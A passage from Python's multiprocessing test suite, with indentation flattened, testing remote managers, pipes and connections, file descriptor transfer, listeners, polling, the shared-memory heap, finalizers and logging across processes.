bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
